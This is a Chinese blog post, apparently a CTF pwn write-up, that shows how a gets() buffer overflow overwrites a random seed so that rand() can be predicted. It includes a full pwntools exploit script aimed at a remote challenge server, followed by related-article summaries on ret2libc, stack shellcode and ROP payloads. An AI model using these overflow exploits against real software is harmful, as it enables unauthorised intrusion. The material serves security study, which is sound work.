pwn -----gets 漏洞的利用

最新推荐文章于 2025-07-27 13:23:17 发布
最新推荐文章于 2025-07-27 13:23:17 发布
阅读量2.2k 收藏 4
点赞数
CC 4.0 BY-SA版权
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41071646/article/details/85345053
本文介绍了一种通过PWN技术解决安全挑战的方法。利用gets函数的漏洞,通过覆盖随机种子,作者成功预测了随机数生成,从而直接获得了flag。文章详细介绍了从IDA分析到编写Exploit的全过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

其实做pwn题是有一段时间了  但是因为复习以及学习驱动 所以没有什么时间写博客  然后这一次写一个pwn的题 

这个题 还是很简单的 

 

先用ida 看一下 发现了 我们这个题 有明显的利用漏洞 gets  然后 我们发现了  有srand 是要确定随机种子 那么 如果 我们 把这个种子 给覆盖掉  那么我们就可以 算出随机数 直接 得到flag  

在 调试下 发现了  

然后输入了 33个 1  发现种子(地址是00007FFC1A24E230)

成功被覆盖成1  那么就很好说了 

我们直接  32*a +自己想要的种子  就可以了 

写出 exp

#coding=utf-8
from pwn import*
from ctypes import*
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
#io=process('/home/pipixia/桌面/level2' )
io=remote('111.198.29.45','32393')
p='a'*0x20+p64(0)
io.sendlineafter("name:",p)
libc.srand(0)
for i in range(10):
   io.sendlineafter("number:",str(libc.rand()%6+1))

print io.recv()
print io.recv()

然后我一直不知道怎么用python来写rand 现在知道了 还要调用外部的库。。。。

CTFshow-PWN-栈溢出(pwn56-pwn59)
Welcome To Myon'Blog !
06-14 269
pwn56和pwn57分别是32位和64位系统调用execve("/bin/sh")的shellcode题,可直接交互获取shell。pwn58和pwn59为栈溢出题目,由于未开启NX保护,可以在栈上执行shellcode。解题方法是:通过gets函数输入shellcode,控制流跳转到栈上执行恶意代码。文章提供了32位(pwn58)和64位(pwn59)两种环境的Python利用脚本,使用pwntools生成shellcode并发送,最终获得flag。关键点在于识别可执行栈漏洞和编写对应的shellcod
CTFshow-PWN-栈溢出(pwn55)
Welcome To Myon'Blog !
06-14 261
这是一道32位栈溢出PWN题,利用gets函数漏洞进行ROP攻击。解题思路:通过溢出控制程序流程,先后调用flag_func1(设置flag1为1)和flag_func2(需满足flag1=1且参数为0xACACACAC),最后调用flag函数(需满足flag1&flag2=1且参数为0xBDBDBDBD)。EXP构造了包含三个函数地址和所需参数的payload,成功获取flag。最终flag为ctfshow{e4a15f8b-48a0-46ce-9783-7fa48bef281a}。
buu pwn刷题——分类题型1——gets溢出无脑填充
苗_的博客
09-07 1390
gets漏洞 gets从标准输入设备读字符串函数,其可以无限读取,不会判断上限,以回车结束读取,所以应该确保buffer的空间足够大,以便在执行读操作时不发生溢出。 栈结构: (图自ctf-wiki) warmup_csaw_2016 找到gets漏洞,v5到rbp有0x40的内存 无脑填充即可:'a' * 0x40 + 'b' * 8 + p64(0x40060d) exp #!/usr/bin/python from pwn import * r = remote('no
gets函数的漏洞
huangbo201102的专栏
01-16 4446
gets函数的漏洞 gets函数和fgets函数最大的不同是gets函数的缓冲区虽然由用户提供,但是用户无法指定其一次最多读入多少字节的内容。这一点导致gets变成了一个非常危险的函数。 下例演示了gets函数的危险性。该程序定义了一个缓冲区,但是使用gets函数接收用户输入的字符串时却会出现问题。 (1)在vi编辑器中编辑该程序如下: 程序清单21-5 risk.c 利用
【二进制安全】PWN基础入门大全(非常详细)零基础入门到精通,收藏这一篇就够了
Python_0011的博客
06-27 865
PWN是一个黑客之间使用的词语,通常指攻破设备或系统。发音类似“砰”,对黑客而言,这象征着成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被操纵了。在网络安全语境中,PWN通常指的是通过不同的攻击手段如利用漏洞、进行社会工程学攻击等方法成功地获得了一个设备、系统或网络的未授权控制权。一旦攻击者“PWN了”一个系统,他们就可以执行各种恶意活动,如窃取数据、安装恶意软件或制造更广泛的破坏。
gets 函数漏洞执行代码
草草君
11-20 775
gets 函数漏洞执行代码 最近学习了 AFL 工具,同时根据进行了gets函数的漏洞执行代码,具体的原理分析准备以后有时间进行详细分析,目前只是做一个记录,主要内容参考自这里. 环境:kali 4.13.0-kali1-amd64 1. 安装工具peda :   在命令行执行 git clone https://github.com/longld/peda.git ~/peda ech...
Linux栈溢出漏洞原理,盘它!PWN栈溢出漏洞
weixin_35712811的博客
05-13 573
本帖最后由 yanzm 于 2019-2-20 10:43 编辑在国内的CTF比赛中,PWN题最常见考点就是缓冲区溢出漏洞,而缓冲区溢出代表就是栈溢出漏洞。0x01 基础知识栈是一种先进后出的数据结构,从高地址向低地址增长的内存结构。函数调用栈是指程序运行时内存一段连续的区域,用来保存函数运行时的状态信息,包括函数参数与局部变量等,是系统栈的一部分。在一次函数调用中,函数调用栈中将被依次压入:函数...
PWN简单堆栈溢出漏洞利用(二)
SkYe's Blog
08-12 844
PWN简单堆栈溢出漏洞利用(二) 题目来源 下载链接(密码akcz) 题目需要读取flag文件才能正确显示出flag,也就是下文中显示的 This is flag 创建办法: 在/home/pwn/pwn1目录下创建一个名为flag文件,打开并写入This is flag 1. 运行程序、查看文件类型、保护措施 程序让我们输入一段字符串,并返回我们所输入的内容。 看到是一个 32位 动态链...
CTFshow-PWN-栈溢出(pwn47)
Welcome To Myon'Blog !
06-09 322
摘要:这是一篇关于32位小端序系统漏洞利用的技术分析文章。作者通过分析存在NX保护的二进制文件,利用gets函数的溢出漏洞和提供的/bin/sh偏移地址,构建了ret2libc攻击。文章详细介绍了如何通过泄露puts函数地址来定位libc基址,最终获取system函数地址完成攻击。攻击脚本使用pwntools工具包实现,重点解决了libc版本选择问题(最终选用libc6-i386_2.27-3ubuntu1_amd64),成功获取了flag。该技术适用于32位栈传参架构,展现了典型的ROP攻击方法。
hackthebox-Pwn-You know 0xDiablos(ret2text)
最新发布
Welcome To Myon'Blog !
07-27 41
摘要:通过分析64位程序发现存在gets栈溢出漏洞利用flag函数,构造payload覆盖返回地址,其中包含负数参数(通过补码转换)。最终成功获取flag:HTB{0ur_Buff3r_1s_not_healthy}。关键点:确定偏移量188字节,使用p32处理负数参数,并正确接收返回数据。
湖湘杯2021-pwn-final部分复现
qq_53062301的博客
12-09 5072
第一次参加awd+,虽然成绩不是很好(大佬太多被打烂了),有很多收获,awd+赛制中可以通过攻击和防御两个手段来得分,攻击的话就是类似于正常的ctf,只不过如果成功攻击后,平台会使用官方的exp来去打全场,就是如果攻击成功,每轮(这次湖湘杯是20分钟一轮)都会获得攻击得分,得分会随着做题成功人数增多而减少,防御的话就是patch一下程序,然后通过ftp上传到服务器上,然后申请防御,也是防御成功就会每轮都会得分,但是防御有三种情况,一种是exp利用成功,也就是没有防御成功,还有一种清况,就是c...
缓冲区溢出漏洞那些事:C -gets函数
m0_71745258的博客
02-21 819
攻击者通过覆盖应用程序的内存来利用缓冲区溢出问题。这会改变程序的执行路径,触发损坏文件或暴露私人信息的响应。例如,攻击者可能会引入额外的代码,向应用程序发送新指令以访问IT 系统。如果攻击者知道程序的内存布局,他们可以故意提供缓冲区无法存储的输入,并覆盖保存可执行代码的区域,用他们自己的代码替换它。例如,攻击者可以覆盖指针(指向内存中另一个区域的对象)并将其指向漏洞利用负载,从而获得对程序的控制权。如图片过大被平台压缩导致看不清的话,扫码下方二维码优快云大礼包:《黑客&网络安全入门&进阶学习资源包。
gets(s)存在的溢出漏洞问题
miaobeihai的博客
03-02 3281
scanf遇到输出不能有空格,所以用gets输入字符串,但是gets出现了一个潜在问题,gets将不停地往s中塞东西,不管s的可用空间是否足够,就存在溢出漏洞问题 解决方案可以用fgets代替, 不如说char s[100],buf[100]; fgets(buf,sizeof(s),stdin); while(fgets(buf,sizeof(buf),stdin)//循环输入
gets()的结构性缺陷和补救措施
JokesForJoker的博客
08-17 1324
获取函数
CTF PWN入坑
Alan-WalkBill的博客
11-24 671
CTF PWN入门(二) 1.攻防世界 when_did_you_born 老规矩,uabntu下查看是几位程序,开了什么保护,然后用ida F5大法,分析 发现一个重要的gets函数,和得到flag的条件。从v5覆盖到v6 上脚本, 然后执行, 得到flag。 2.hello pwn 文件查看发现是64位,用64位ida Pro打开,F5大法得到 得到一个条件,再看看sub_40086这个函数...
PWN-栈溢出
GalaxySpaceX的博客
08-26 1366
PWN-栈溢出
PWN学习笔记(1)
Jason_ZhouYetao的博客
07-16 3014
首先来说说pwn,这个水还是很深的,不过我学习pwn的原因是我觉得pwn是最接近黑客的东西,当然web也是我考虑的一个方向,但是pwn更加偏向于对代码这方面的知识,所以我也就选择了pwn这个方向。 0x1 首先pwn的最基本的东西就是c语言,一般的pwn题目都是以c代码来出的题目,所以学好c是做pwn的前提,之后还需要一定的Linux命令的基础和各种插件的使用(比如在溢出这块还是以gdb的pe...
CTF-PWN学习-为缺少指导的同学而生
热门推荐
yuwoxinanA3的博客
05-11 2万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
polarctf-简单溢出题
03-30
在PolarCTF的简单缓冲区溢出题目中,核心目标是利用`read`函数读取数据时的溢出漏洞覆盖返回地址,从而控制程序执行流程[^1]。以下是具体步骤: 1. **确定偏移量** 栈结构通常为:局部变量(如`buf`)→ 保存的`...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值